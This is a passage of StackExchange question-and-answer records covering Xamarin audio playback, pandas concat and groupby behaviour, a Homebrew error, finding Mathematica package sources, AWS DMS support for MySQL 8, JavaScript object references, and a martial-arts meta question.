IPlayAudio\n{\n void playaudio();\n}\n<\/code>\nThen create one class that implements IPlayAudio in the Android platform, the platform implementations must be registered with the DependencyService, so that Xamarin.Forms can locate them at runtime.\n<code>[assembly: Dependency(typeof(PlayAudiomethod))]\nnamespace playvideo.Droid\n{ \npublic class PlayAudiomethod : IPlayAudio\n{\n private MediaPlayer _player;\n public void playaudio()\n {\n _player = MediaPlayer.Create(MainActivity.mac, Resource.Raw.MyAudio);\n _player.Start();\n }\n}\n}\n<\/code>\nFor MainActivity.mac, please create static member called \"mac\" in MainActivity and set it after the call to LoadApplication.\n<code>public class MainActivity : global::Xamarin.Forms.Platform.Android.FormsAppCompatActivity\n{\n public static MainActivity mac;\n protected override void OnCreate(Bundle savedInstanceState)\n {\n TabLayoutResource = Resource.Layout.Tabbar;\n ToolbarResource = Resource.Layout.Toolbar;\n\n base.OnCreate(savedInstanceState);\n\n Xamarin.Essentials.Platform.Init(this, savedInstanceState);\n global::Xamarin.Forms.Forms.Init(this, savedInstanceState); \n LoadApplication(new App());\n mac = this;\n\n \n }\n \n}\n<\/code>\nNow you can play audio from the Xamarin.Forms shared code.\n<code> private void mediaplayer_Clicked(object sender, EventArgs e)\n {\n DependencyService.Get<IPlayAudio>().playaudio();\n }\n<\/code>\nNote: please set xxx.mp3 Build Action as AndroidResource.\nComment: Thank you for your sincere answer. is it possible to find a localized raw folder automatically? I played an audio file when just one raw folder, but I have to divide the folder for localizing. then I tried the media player doesn't work....\nComment: @cocoadrinker About localized audio file on Android, you can try to take a look https:\/\/learn.microsoft.com\/en-us\/xamarin\/xamarin-forms\/app-fundamentals\/localization\/text?pivots=windows#localize-images-on-android\n","meta":{"source":"stackoverflow","title":"Resources raw folder localize in xamarin.forms","dup_signals":{}},"subset":"stackexchange"} +{"text":"pandas.concat ignores keys when ignore_index=True, is this a bug?\n\nQuestion: When I do <code>pd.concat((df1, df2), keys=('A', 'B'), ignore_index=True)<\/code> it ignores the keys. I couldn't find any mention of this in the documentation, am I missing something or is this a bug?.\ncode example:\n<code>import pandas as pd\nimport numpy as np\n\ndf1 = pd.DataFrame(np.random.uniform(0, 1, (5, 5)))\ndf2 = pd.DataFrame(np.random.uniform(0, 1, (5, 5)))\n\nprint(pd.concat((df1, df2), keys=('A', 'B')))\nprint(pd.concat((df1, df2), keys=('A', 'B'), ignore_index=True))\n<\/code>\noutput:\n<code> 0 1 2 3 4\nA 0 0.548398 0.285250 0.690403 0.646567 0.881671\n 1 0.560004 0.111783 0.155743 0.587277 0.485484\n 2 0.258623 0.243698 0.881638 0.686399 0.229254\n 3 0.492586 0.324359 0.922460 0.744553 0.316212\n 4 0.131956 0.693708 0.620376 0.893369 0.371382\nB 0 0.633036 0.402043 0.609046 0.212024 0.988794\n 1 0.383615 0.575692 0.320391 0.391028 0.589542\n 2 0.326453 0.879162 0.916395 0.525230 0.532779\n 3 0.273823 0.229596 0.326523 0.989329 0.340129\n 4 0.152274 0.445670 0.133162 0.112688 0.572573\n 0 1 2 3 4\n0 0.548398 0.285250 0.690403 0.646567 0.881671\n1 0.560004 0.111783 0.155743 0.587277 0.485484\n2 0.258623 0.243698 0.881638 0.686399 0.229254\n3 0.492586 0.324359 0.922460 0.744553 0.316212\n4 0.131956 0.693708 0.620376 0.893369 0.371382\n5 0.633036 0.402043 0.609046 0.212024 0.988794\n6 0.383615 0.575692 0.320391 0.391028 0.589542\n7 0.326453 0.879162 0.916395 0.525230 0.532779\n8 0.273823 0.229596 0.326523 0.989329 0.340129\n9 0.152274 0.445670 0.133162 0.112688 0.572573\n<\/code>\nEDIT:\npython version = 3.9.0.final.0\npandas version = 1.2.3\nEDIT:\nTo be clear what I was expecting is:\n<code> 0 1 2 3 4\nA 0 0.548398 0.285250 0.690403 0.646567 0.881671\n 1 0.560004 0.111783 0.155743 0.587277 0.485484\n 2 0.258623 0.243698 0.881638 0.686399 0.229254\n 3 0.492586 0.324359 0.922460 0.744553 0.316212\n 4 0.131956 0.693708 0.620376 0.893369 0.371382\nB 5 0.633036 0.402043 0.609046 0.212024 0.988794\n 6 0.383615 0.575692 0.320391 0.391028 0.589542\n 7 0.326453 0.879162 0.916395 0.525230 0.532779\n 8 0.273823 0.229596 0.326523 0.989329 0.340129\n 9 0.152274 0.445670 0.133162 0.112688 0.572573\n<\/code>\nComment: What output were you expecting?\nComment: @HenryEcker I was expecting to get the same as when I have ignore_index=False except that level 1 of the resulting multiindex should have new consecutive numbers from 0 to n.\nComment: The keys are your index. You're passing an argument to ignore the index. That's exactly the output I would expect.\nComment: @Abstract keys are a new level of the new index, I was expecting the old index to be ignored not the new index.\nComment: it can help : https:\/\/stackoverflow.com\/questions\/49620538\/what-are-the-levels-keys-and-names-arguments-for-in-pandas-concat-functio\nAnswer: You might need to add a reset_index() after concatenatinng\n<code>print(pd.concat((df1, df2), keys=('A', 'B'), ignore_index=False).reset_index(drop=True, inplace=True))\n<\/code>\nComment: Please explain your answer a bit and let OP know how this is going to help OP, and if possible please add the sample output as well.\nComment: Thank you for your answer but I already knew that I could do this I just didn't think that it would be necessary as I thought that just specifying keys and `ignore_index=True\u00b4 should do the job. My question was not \"how do I achieve my desired result\" but rather \"why doesn't pandas do as I was expecting\" and \"is it a bug or the intended behavior\".\n","meta":{"source":"stackoverflow","title":"pandas.concat ignores keys when ignore_index=True, is this a bug?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Homebrew OSX 10.9.3: \/usr\/local\/Library\/brew.rb:37:in `': uninitialized constant OS (NameError)\n\nQuestion: I think I have a borked installation of Homebrew. Whenever I type any of the brew commands, I get an uninitialized constant OS error.\n<code>MacBook-Pro-2:~ aramu$ brew update\n\/usr\/local\/Library\/brew.rb:37:in `<main>': uninitialized constant OS (NameError)\nMacBook-Pro-2:~ aramu$ brew doctor\n\/usr\/local\/Library\/brew.rb:37:in `<main>': uninitialized constant OS (NameError)\nMacBook-Pro-2:~ aramu$ brew --config\n\/usr\/local\/Library\/brew.rb:37:in `<main>': uninitialized constant OS (NameError)\n<\/code>\nI looked through the solution for a similar question (OSX Homebrew error: uninitialized constant MACOS) which suggested that my user be the owner of \/usr\/local\/ and everything within. It still doesn't work for me. \nNote: The machine had been previously used and on receiving it, I have created a new user for me with admin privileges. \nThe following is how the permissions are set for that folder now:\n<code>MacBook-Pro-2:~ aramu$ ls -lrth \/usr\/local\/\ntotal 80\ndrwxrwxr-x 5 aramu admin 170B Oct 22 2013 libexec\ndrwxrwxr-x 4 aramu admin 136B Jan 28 14:20 var\ndrwxrwxr-x 10 aramu admin 340B Jan 28 14:20 share\ndrwxr-xr-x 5 aramu admin 170B Jan 28 14:20 opt\ndrwxr-xr-x 5 aramu admin 170B Jan 28 14:20 man\ndrwxrwxr-x 24 aramu admin 816B Jan 28 14:20 lib\ndrwxrwxr-x 29 aramu admin 986B Jan 28 14:20 include\ndrwxrwxr-x 4 aramu admin 136B Jan 28 14:20 etc\n-rw-r--r-- 1 aramu admin 23K Jun 4 16:14 SUPPORTERS.md\n-rw-r--r-- 1 aramu admin 1.8K Jun 4 16:14 README.md\n-rw-r--r-- 1 aramu admin 1.2K Jun 4 16:14 LICENSE.txt\n-rw-r--r-- 1 aramu admin 687B Jun 4 16:14 CONTRIBUTING.md\n-rw-r--r-- 1 aramu admin 3.1K Jun 4 16:14 CODEOFCONDUCT.md\ndrwxrwxr-x 31 aramu admin 1.0K Jul 10 14:16 bin\ndrwxrwxr-x 9 aramu admin 306B Jul 10 14:22 Library\nMacBook-Pro-2:~ aramu$\n<\/code>\nAnswer: The solution I found for solving this was to completely uninstall Homebrew from the system and start from scratch. \nI used the code provided in this Github Gist to uninstall homebrew.\n","meta":{"source":"stackoverflow","title":"Homebrew OSX 10.9.3: \/usr\/local\/Library\/brew.rb:37:in `': uninitialized constant OS (NameError)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Finding the max value for a hierarchy level over another level\n\nQuestion: Let's say I have a DataFrame like this:\n<code>l1 1 2 \nl2 1 13 99 89\n0 1 2 2 1\n<\/code>\nand for each value of <code>l1<\/code>, I want to find the corresponding max value amongst the <code>l2<\/code> values under that <code>l1<\/code> value. Is there an easy way to do this using groupby?\nso in the above example it would be <code>1->2<\/code> and <code>2->99<\/code>\nMy current solution is along the lines of:\n<code>grouped = swapped.groupby(level=\"l1\",axis=1)\nmaxes = []\nfor n,g in grouped:\n maxes.append((n, max([x[1] for x in g.columns]))) # we take max over level l2 \n<\/code>\nAnswer: <code>In [33]: df = DataFrame([[1,2,2,1]],\n columns=MultiIndex.from_tuples([(1,1),(1,13),(2,99),(2,89)],names=['l1','l2']))\n\nIn [34]: df\nOut[34]: \nl1 1 2 \nl2 1 13 99 89\n0 1 2 2 1\n\nIn [35]: df.T.reset_index().groupby('l1').max()\nOut[35]: \n l2 0\nl1 \n1 13 2\n2 99 2\n<\/code>\n","meta":{"source":"stackoverflow","title":"Finding the max value for a hierarchy level over another level","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to find the package file that stores a certain symbol?\n\nQuestion: Is it possible to figure out in what file a certain packaged symbol lives in (assuming there is no shadowing between multiple identical symbol names)? I would like to have a function that if, given a context or a symbol from a context, opens up the relevant package file.\nWith <code>Needs<\/code> Mathematica automatically loads all symbols in each package file of the given context if directories are set correctly with <code>$Path<\/code>. It seems though that I cannot access the information from which file Mathematica pulls each symbol. It is an overkill to scan through all directories in <code>$Path<\/code> and through all files in each directory to find the given symbol. Is there an easier method?\nComment: I'm pretty sure that this information is not stored: to load a package, *Mathematica* just opens a stream and reads from it as if it were any other sort of input. Still, good question, +1.\nComment: @Mr.Wizard If a given context (via `Needs`) pulls symbols from different files (as e.g. mentioned in [this](http:\/\/mathematica.stackexchange.com\/a\/22407\/89) case), than it is not a matter of convention but a matter of taste in which file the symbol is actually stored.\nComment: In old versions, this would have been a bit easier to do: one just scans the `init.m` file associated with each package group (e.g. ``Algebra` ``, ``NumericalMath` ``, ...) and looks at the `DeclarePackage[]` lines for the appropriate functions. The new way things are arranged now makes things slightly hairier.\nComment: If you follow the convention of having the context match the file name of the package wouldn't this be almost trivial? Do you have a reason *not* to follow that convention?\nAnswer: My previous answer had heavy shortcomings and errors, so I took a deeper breath and figured out a more robust way.\nThe problem with <code>FindFile[\"context`\"]<\/code> is twofold. First, it can only return the first file in a possibly long list of files adding to the same context. Second, it might not work on a context extracted from a symbol because symbol contexts might not be identical to the package name. The package specification in Mathematica is confusing: <code>myPackage`<\/code> means two different things:\n\nFILENAME: If <code>Get[\"myPackage`\"]<\/code> (or <code>Needs<\/code>) is called, Mathematica will interpret <code>myPackage<\/code> as a file path using <code>FindFile<\/code> to figure out the source.\nCONTEXT: In <code>BeginPackage[\"myPackage`\"]<\/code> (or <code>Begin<\/code>) and in <code>myPackage`symbol<\/code>, <code>mypackage<\/code> is interpreted as a namespace within the memory, and has nothing to do with files. <code>$Packages<\/code> and <code>$ContextPath<\/code> only store these contexts but not package-file-path-specifiers of point 1.\n\nThere is no guarantee, that the package name agrees with the context name. Though this is the convention, a package defined at path <code>...\/myPackage<\/code> might not contain the line <code>BeginPackage[\"myPackage`\"]<\/code> in it. One can easily create artificial cases where a package file at <code>...\/package.m<\/code> (called as <code>Get[\"package`\"]<\/code>) loads symbols like <code>context`sym<\/code>.\nTo be clear, any package you design should have at least one file in it which has the same name as the context it generates. If context and file name do not match, either the file is not found (if context is called by <code>Needs<\/code>, resulting in <code>Get::noopen<\/code> error) or context is not created (if filename is called by <code>Needs<\/code>, resulting in <code>Needs::nocont<\/code> error). Note however, that in the latter case, the file is nevertheless loaded, regardless of the expected context. The reason I say \"at least one file\" above is because this file then can call any other package file in the same directory (obviously with different file names) or from other directories.\nSo a foolproof solution to find all package files could only work if it knows the associations between filenames and contexts. To have that, package calls have to be monitored and the collected data stored. In another answer I presented <code>safeGet<\/code> that can read a package, collect all the files that are touched by successive package calls from within and at the end removes all contexts and symbols introduced during all the calls. With <code>safeGet<\/code> it becomes possible to capture the necessary data to identify sources. <code>safeGetSource<\/code> is a light version of <code>safeGet<\/code> that only captures context -> file associations but not all files (like <code>init.m<\/code>-s that don't contain context-creating code).\n<code>contextJoin[s:{__String}] := StringReplace[StringJoin[#<>\"`\"& \/@s], \"`\".. -> \"`\"]\npackageButton[file_String] := Button[FileNameTake@file, NotebookOpen@file, \n Appearance -> \"Palette\"];\n\nsafeGetSource[pkg_String, arg___] := Module[{\n bp, ep, begin, end, contexts = {}, assoc = {}, all, \n cStack = {$Context}, cpStack = {$ContextPath}},\n Block[{$Packages = $Packages, $ContextPath = $ContextPath, $Context = $Context},\n Off[General::shdw];\n bp[ctx_] := bp[ctx, {}];\n bp[ctx_, needed_List] := (\n AppendTo[cStack, $Context];\n AppendTo[cpStack, $ContextPath];\n $ContextPath = DeleteDuplicates@Join[{ctx}, needed, {\"System`\"}];\n $Packages = DeleteDuplicates@Prepend[$Packages, ctx];\n $Context = ctx;\n assoc = Union[assoc, {$Context -> packageButton@$InputFileName}];\n contexts = Union[contexts, {$Context}];\n Needs \/@ needed;\n ctx);\n begin[ctx_] := (\n AppendTo[cStack, $Context];\n $Context = contextJoin@{$Context, ctx};\n assoc = Union[assoc, {$Context -> packageButton@$InputFileName}];\n contexts = Union[contexts, {$Context}];\n ctx);\n ep[] := ({$ContextPath, cpStack} = {Last@cpStack, Most@cpStack};\n {$Context, cStack} = {Last@cStack, Most@cStack};);\n end[] := ({$Context, cStack} = {Last@cStack, Most@cStack};);\n Block[{BeginPackage=bp, EndPackage=ep, Begin=begin, End=end}, Get[pkg, arg]];\n all = # <> \"*\" & \/@ contexts;\n Unprotect \/@ all;\n Quiet[Remove \/@ all];\n On[General::shdw];\n assoc\n ]];\n\nassoc = safeGetSource@\"OpenCLLink`\"\n<\/code>\n\n<code>{\n \"CCompilerDriver`\" -> \"CCompilerDriver.m\",\n \"CCompilerDriver`CCompilerDriverBase`\" -> \"CCompilerDriverBase.m\",\n \"CCompilerDriver`CCompilerDriverBase`Private`\" -> \"CCompilerDriverBase.m\",\n \"CCompilerDriver`CCompilerDriverRegistry`\" -> \"CCompilerDriverRegistry.m\",\n \"CCompilerDriver`CCompilerDriverRegistry`Private`\" -> \"CCompilerDriverRegistry.m\",\n \"CCompilerDriver`GenericCCompiler`\" -> \"GenericCCompiler.m\",\n \"CCompilerDriver`GenericCCompiler`Private`\" -> \"GenericCCompiler.m\",\n \"CCompilerDriver`IntelCompiler`\" -> \"IntelCompiler.m\",\n \"CCompilerDriver`IntelCompilerWindows`\" -> \"IntelCompilerWindows.m\",\n \"CCompilerDriver`IntelCompilerWindows`Private`\" -> \"IntelCompilerWindows.m\",\n \"CCompilerDriver`Private`\" -> \"CCompilerDriver.m\",\n \"CCompilerDriver`System`\" -> \"System.m\",\n \"CCompilerDriver`System`Private`\" -> \"System.m\",\n \"CCompilerDriver`VisualStudioCompiler`\" -> \"VisualStudioCompiler.m\",\n \"CCompilerDriver`VisualStudioCompiler`Private`\" -> \"VisualStudioCompiler.m\",\n \"CUDALink`\" -> \"CUDALink.m\",\n \"CUDALink`NVCCCompiler`\" -> \"NVCCCompiler.m\",\n \"CUDALink`NVCCCompiler`Private`\" -> \"NVCCCompiler.m\",\n \"CUDALink`Private`\" -> \"CUDALink.m\",\n \"GPUTools`\" -> \"GPUTools.m\",\n \"GPUTools`CodeGenerator`\" -> \"CodeGenerator.m\",\n \"GPUTools`CodeGenerator`Private`\" -> \"CodeGenerator.m\",\n \"GPUTools`Detection`\" -> \"Detection.m\",\n \"GPUTools`Detection`Private`\" -> \"Detection.m\",\n \"GPUTools`Private`\" -> \"GPUTools.m\",\n \"GPUTools`SymbolicGPU`\" -> \"SymbolicGPU.m\",\n \"GPUTools`SymbolicGPU`Private`\" -> \"SymbolicGPU.m\",\n \"GPUTools`Utilities`\" -> \"Utilities.m\",\n \"GPUTools`Utilities`Private`\" -> \"Utilities.m\",\n \"LibraryLink`\" -> \"LibraryLink.m\",\n \"LibraryLink`Private`\" -> \"LibraryLink.m\",\n \"OpenCLLink`\" -> \"OpenCLLink.m\",\n \"OpenCLLink`Private`\" -> \"OpenCLLink.m\",\n \"SymbolicC`\" -> \"SymbolicC.m\",\n \"SymbolicC`Private`\" -> \"SymbolicC.m\"\n}\n<\/code>\n\nQuerying a symbol can now be done as:\n<code> Context@symbol \/. assoc\n<\/code>\nExamining <code>\"PacletManager<\/code>\"`` reveals that the one public context calls quite a few files:\n<code> safeGetSource@\"PacletManager`\"\n<\/code>\n\n<code>{\n \"PacletManager`\" -> \"PacletManager.m\",\n \"PacletManager`Collection`Private`\" -> \"Collection.m\",\n \"PacletManager`Documentation`Private`\" -> \"Documentation.m\",\n \"PacletManager`Extension`Private`\" -> \"Extension.m\",\n \"PacletManager`LayoutDocsCollection`Private`\" -> \"LayoutDocsCollection.m\",\n \"PacletManager`Manager`Private`\" -> \"Manager.m\",\n \"PacletManager`MemoryCollection`Private`\" -> \"MemoryCollection.m\",\n \"PacletManager`Package`\" -> \"Collection.m\",\n \"PacletManager`Package`\" -> \"Documentation.m\",\n \"PacletManager`Package`\" -> \"Extension.m\",\n \"PacletManager`Package`\" -> \"LayoutDocsCollection.m\",\n \"PacletManager`Package`\" -> \"Manager.m\",\n \"PacletManager`Package`\" -> \"MemoryCollection.m\",\n \"PacletManager`Package`\" -> \"Packer.m\",\n \"PacletManager`Package`\" -> \"Paclet.m\",\n \"PacletManager`Package`\" -> \"PacletManager.m\",\n \"PacletManager`Package`\" -> \"Services.m\",\n \"PacletManager`Package`\" -> \"Utils.m\",\n \"PacletManager`Package`\" -> \"Zip.m\",\n \"PacletManager`Packer`Private`\" -> \"Packer.m\",\n \"PacletManager`Paclet`Private`\" -> \"Paclet.m\",\n \"PacletManager`Private`\" -> \"PacletManager.m\",\n \"PacletManager`Services`Private`\" -> \"Services.m\",\n \"PacletManager`Utils`Private`\" -> \"Utils.m\",\n \"PacletManager`Zip`Private`\" -> \"Zip.m\"\n}\n<\/code>\n\nLet's see a less complicated example, with a non-conventional package-context association (made for this purpose). Note, that while the package was called as <code>\"MyPackage`\"<\/code>, the context added to memory and captured by <code>safeGetSource<\/code> is <code>\"MyContext`\"<\/code>:\n<code> safeGetSource@\"MyPackage`\"\n<\/code>\n\n<code>{\n \"Functions`\" -> \"Functions.m\",\n \"Functions`Private`\" -> \"Functions.m\",\n \"MyContext`\" -> \"file.m\",\n \"Test`\" -> \"Common.m\",\n \"Test`\" -> \"TestA.m\",\n \"Test`\" -> \"TestB.m\",\n \"Test`Private`\" -> \"TestA.m\",\n \"Test`Private`\" -> \"TestB.m\"\n}\n<\/code>\n\nThe dependency tree of the above call, created by <code>safeGet<\/code>:\nComment: I'll admit that I didn't try to understand how it works, I just tried it on the package I wanted to do this with last time: ``safeGet[\"OpenCLLink`\"]``. Unfortunately it seems to go into an infinite recursion.\nComment: @Szabolcs Thanks for taking the time to test it! The previous code was crap, please check new version.\nComment: In `contextJoin` (first line in code box), `str` should be corrected to `s`, right?\nComment: @Szabolcs Sure, thanks, corrected. Made the line shorter to fit the page width but forgot to replace all vars.\nComment: Would you like to submit a patch to the spelunking package to add this (and related) functionality? (This would be a separate function, but part of the same package.)\nComment: @Szabolcs Thank you, I will gladly add to it! Just want to test it a bit further and see how people test it. Some bugs surely will surface...\nComment: @Szabolcs I might have considered your offer more seriously than necessary. In the last weeks I was busy to combine functionality of three domains: packages-and-contexts, symbols and definitions, as these are used all the time during development. I now have working code in all three. I would like to discuss it with you how it should be published, as I it nicely fits spelunking, but is more than what that package aims for. Would you have time to meet me in chat sometimes to revise the code and decide on how to introduce it to the community? I would really appreciate it.\nComment: Let's do it tomorrow some time after 18:30 Budapest time ... I'm teaching tomorrow so I need to prepare for that today. But you can consider a completely separate package as well. After all this functionality would be separate from spelunking (it would not depend on it) and the spelunking package can always load another one.\nComment: @Szabolcs Great, I'll be around in the afternoon!\nComment: @Szabolcs Here is the link for the room: [http:\/\/chat.stackexchange.com\/rooms\/13252\/discussion-between-szabolcs-and-istva\u200c\u200bn](http:\/\/chat.stackexchange.com\/rooms\/13252\/discussion-between-szabolcs-and-istva\u200c\u200bn)\nComment: Thanks for the explanation of the context and file name. However, I still have a problem about the doc of `Get`, which I'll quote here, \"If name is the name of a Wolfram Language _context_ , ending with a ` context mark character, then Get will process this name to find the file to read. \" My question is, in principle, the context's name can be different with the file name, in this case, there is no way to find the file. I think the right words are, the name before backtick can _only_ be file or directory name, even though it's meant to be context name. Did I understand this correctly?\nComment: @luyuwuli That is right. See my edit in the answer that intends to clarify this point.\nComment: Thanks for your response. Now, I finally figure this subtlety out.\nAnswer: Just a really quick hack that is nevertheless useful sometimes:\n<code>LocateFunction[f_]:=(SystemOpen[Context[f]];NotebookFind[SelectedNotebook[],f\/\/ToString])\n<\/code>\nIf applicable, this opens the package relating to the symbol\u00b4s context and primes the search (use F3 to search for subsequent locations of the symbol).\nComment: Actually, `SystemOpen` uses `FindFile` under the hood, so that might be more straightforward to use. My problem with this approach is that it can only point you to the first file loaded in the chain, but there is no way (without actually running `Get`) to know what other files are related. +1 nevertheless.\nComment: @Istv\u00e1nZachar you are absolutely correct. This is just something I cobbled together some time ago on the fly, but it has proven useful mainly for packages of my own doing.\n","meta":{"source":"mathematica.stackexchange","title":"How to find the package file that stores a certain symbol?","dup_signals":{}},"subset":"stackexchange"} +{"text":"MYSQL 8.0.19 (ON PREMISE) as source in AWS DMS?\n\nQuestion: Can someone please confirm if my on premise MYSQL 8.0.19 instance can be used as source in Aws Database migration service ,with target as aws redshift.\nThe articles I read show only MySQL versions 5.5, 5.6, and 5.7 as supported.\nhttps:\/\/docs.aws.amazon.com\/dms\/latest\/userguide\/CHAP_Source.html\nWondering if support is provided as of MAY 2020.\nPS: I ran into problem while setting task (AWS DMS FULL load) with mysql(on premise) 8.0.19 as source and redshift as target.\nThe task is set but the table load fails with table error.\nAnswer: AWS DMS frustratingly still doesn't support MySQL 8 as a source as far as I know. \nHere's a related support thread in the AWS Developer Forums:\nDMS task fails when migrating RDS MySQL 8 database . In that thread, an AWS staffer commented on January 28 that it should be supported with DMS version 3.4 (the current version is 3.3.2), however they haven't provided any details on when we can expect 3.4 to be available.\nComment: But one of my colleague was successfull in getting RDS mysql 8+ migrated using DMS.My On the other hand is onprem mysql and I am failing with DMS. Finally used aws datapipeline (I sync the table fully ,daily)\n","meta":{"source":"stackoverflow","title":"MYSQL 8.0.19 (ON PREMISE) as source in AWS DMS?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why javascript object value is changed?\n\nQuestion: Can anyone explain to me why the output value is changed to \"20, 2\" instead of the original \"1, 2\"?\n\n<code><!DOCTYPE html>\n<html>\n<body>\n <p id=\"demo\"><\/p>\n <p id=\"demo1\"><\/p>\n <script>\n var x = {\n a: 1,\n b: 2\n };\n var y = x;\n y.a = 20;\n document.getElementById(\"demo\").innerHTML = x.a;\n document.getElementById(\"demo1\").innerHTML = x.b;\n <\/script>\n<\/body>\n<\/html><\/code>\nComment: @Seblor I would argue that there's nothing wrong with using `var` in front end JS, in fact if you're aiming for a good range of browser support, we're still (unfortunately) on the border of having to avoid using let\/const at all.\nComment: JS passes objects by reference, there are some in depth questions relating to this: https:\/\/stackoverflow.com\/questions\/16880418\/javascript-pass-object-as-reference\nComment: Since you seem to be new to JavaScript, I highly suggest *not* using `var` as it is considered bad practice. You should use `let` or `const`.\nComment: @DBS While I understand what you mean, I really think the use of `var` and the browser support should be left to the transpilers (like Babel). If people keep using `var`, they will have a hard time changing later on. Also using the newer ECMAScript versions usually improves the code readability.\nAnswer: You are pointing <code>y<\/code> to the reference of <code>x<\/code> which itself is pointing to the object <code>{a:1,b:2}<\/code>.\nSo in memory it is:\n<code>x --> {a:1,b:2}\n<\/code>\nAfter you do <code>y = x<\/code>, it becomes:\n<code>y --> x --> {a:1,b:2}\n<\/code>\nOr to put it simply:\n<code>x --> {a:20,b:2}\n ^\n |\ny -------\n<\/code>\nNow when you do <code>y.a = 20<\/code>, since <code>y<\/code> and <code>x<\/code> are both pointing to the same object when properties of the object is changed through either of the references <code>x<\/code> or <code>y<\/code> the change will be reflected in both the references:\n<code>y --> {a:20,b:2}\n ^\n |\nx -------\n<\/code>\nThat is why you get <code>20,2<\/code> when you get <code>x.a<\/code>.\nAnswer: <code>var y=x\n<\/code>\nIn the above line <code>y<\/code> is passed the reference of <code>x<\/code> instead of the whole object x. Any changes made to the object will get reflected in all the variables containing the reference of the object. \nAnswer: Because its the same <code>reference<\/code> (same address for memory location where the object is stored) both x and y are now the same reference so changing one will change the value stored, and now as they are the same reference they will output the same object values.\nI would add something extra to make this answer more productive.\n\nShallow -Copy\nShallow copy is a bit-wise copy of an object. A new object is created\n that has an exact copy of the values in the original object. If any of\n the fields of the object are references to other objects, just the\n reference addresses are copied i.e., only the memory address is\n copied.\n\nexample \n<code>let x={\"a\":1,\"b\":2};\nlet y=x; \/\/It makes a copy of the reference to x into y\n<\/code>\nSo, the addresses of x and y will be the same i.e. they will be pointing to the same memory location.\nso if you do this\n<code>y.a=9;\n<\/code>\nand now when you print y on the screen \n<code>console.log(y) \/\/ it prints {\"a\":9,\"b\":2};\n<\/code>\nbut the interesting fact here is , when you print x\n<code>console.log(x) \/\/ it also prints {\"a\":9,\"b\":2};\n<\/code>\nSo Now how to change this scenario??. The solution is a deep copy\n\nDeep copy\nA deep copy copies all fields and makes copies of dynamically\n allocated memory pointed to by the fields. A deep copy occurs when an\n object is copied along with the objects to which it refers.\n\nin Lehman terms you create a variable y allocate it a different memory location, copy all the members of x, assign the copied members to y\nthe easiest way to do it is by <code>stringifying<\/code> the object\n<code>let y=JSON.parse(JSON.stringify(x))\n<\/code>\nnow if we do\n<code>y.a=9\n<\/code>\nand print y\n<code>console.log(y) \/\/ it prints {\"a\":9,\"b\":2};\n<\/code>\nand if we print x\n<code>console.log(x) \/\/ it prints {\"a\":1,\"b\":2};\n<\/code>\n\n<code>\/\/\/ shallow copy\n\nlet x = {\n \"a\": 1,\n \"b\": 2\n};\nlet y = x;\ny.a = 9;\nconsole.log(y);\nconsole.log(x);\n\n\n\/\/ Deep Copy\n\nlet z = {\n \"a\": 1,\n \"b\": 2\n};\nlet t = JSON.parse(JSON.stringify(z));\nt.a = 9;\nconsole.log(\"z:\", z);\nconsole.log(\"t:\", t);<\/code>\n\n\n\nThis scenario becomes more fun when we have nested objects\n\n<code>let c = {\n \"a\": {\n \"A\": 1\n },\n \"b\": {\n \"B\": 2\n }\n};\nlet t = Object.assign({}, c); \/\/ It is also shallow copying\nt.a.A = \"7\"; \/\/ since a is a nested object so again reference is passed\nconsole.log(c);\nconsole.log(t)\nconsole.log(\"Second Scenario-------------------\")\n\n\nlet d = {\n \"a\": {\n \"A\": 1\n },\n \"b\": {\n \"B\": 2\n }\n};\nlet k = JSON.parse(JSON.stringify(d));\nk.a.A = 88\nconsole.log(d)\nconsole.log(k)<\/code>\nAnswer: That is because <code>y<\/code> & <code>x<\/code> both point to same memory location.If you want a separate copy , then deep copy the object. <code>JSON.parse<\/code> & <code>JSON.stringify<\/code> \n\n<code>var x = {\n a: 1,\n b: 2\n};\nvar y = JSON.parse(JSON.stringify(x));\ny.a = 20;\ndocument.getElementById(\"demo\").innerHTML = x.a;\ndocument.getElementById(\"demo1\").innerHTML = x.b;<\/code>\n<code><p id=\"demo\"><\/p>\n<p id=\"demo1\"><\/p><\/code>\n","meta":{"source":"stackoverflow","title":"Why javascript object value is changed?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the process by which a technique gets accepted as viable by a community such as SE?\n\nQuestion: I learn a Martial Art called Shorinji Kempo. The emphasis of this art is on wrist and fine joint Manipulation and strikes to 'vital points'. \nWhenever I answer a question relating to these areas I am asked (not unreasonably) to explain how I know these techniques work. \n\"Vital points\" is a difficult issue because of the unfounded claims made by 'alternative medicine' practitioners such as acupuncturists. While in effect this usually means striking the solar plexus at an upward angle or flicking the eyes with the tips of the fingers the use of the term \"vital points\" can also extend to points on the carotid artery on the neck or even just 'a place on the arm that is painful if you apply pressure \"like so\". It is rare that we actually, for example, strike to the side of the neck for safety reasons (although it is certainly less dangerous than giving someone concussion which some other martial arts are quite happy to do). There is a video where this is done https:\/\/youtu.be\/vSkD7BPpVK4 but as it is done by an instructor on his students (and not by competitors in an octagon) many users here suspect that the people shown are merely acting. \nWrist locks I thought would be an easy subject. But here too other users ask for evidence that they are practical for take-down purposes. It doesn't help that there are plenty of examples of aikido practitioners (the most famous practitioners of joint locks) being defeated by other martial artists. Indeed, those times I have been to aikido dojos I have seen little that is practical, and it's easy to see how this can be taken as evidence that this form of technique is inferior to others (such as judo throws). \nHowever even when I link video of a basic technique that I can do myself other users here (you know who you are but I'm not trying to continue the discussion here) claim that the clip is a fake, with a martial artist falling for no good reason. https:\/\/youtu.be\/0P16QY-CHRM or https:\/\/youtu.be\/qpPFwBdyMZg\nClips showing these against martial artists from other styles are impossible to find because there is no culture for entering competitions of other styles and such competitions ban many of these techniques in any case. \nWhen I looked into entering such competitions myself for example Judo bans these techniques and BJJ does not permit them for low grades (below blue belt). Other styles of Jujitsu also seem to have this approach. UFC style MMA permits these techniques but as this is practiced without a gi and also permits striking techniques opportunity for wrist locks would be minimal and in any case I see no reason to risk concussion over this. \nMost of the people on this site seem to be in a different country (I am in the UK) so we can't meet in order to film sparring match. \nI wouldn't usually particularly mind leaving this sort of thing unresolved, but since SE aims to be an authoritative source of information this seems very problematic to me as it is, as I see it, spreading misinformation. \nSo as stated in the title, the question is what would I need to show to have techniques of this kind accepted as viable in 'real life'? Is there any substitute for competition footage in cases where the technique is banned in competition? \nComment: I'm not sure why this is in meta. This is a fine main-site question.\nAnswer: I've said this before and I'll repeat: most accepted is not the same as correct. You don't need to convince everyone, you 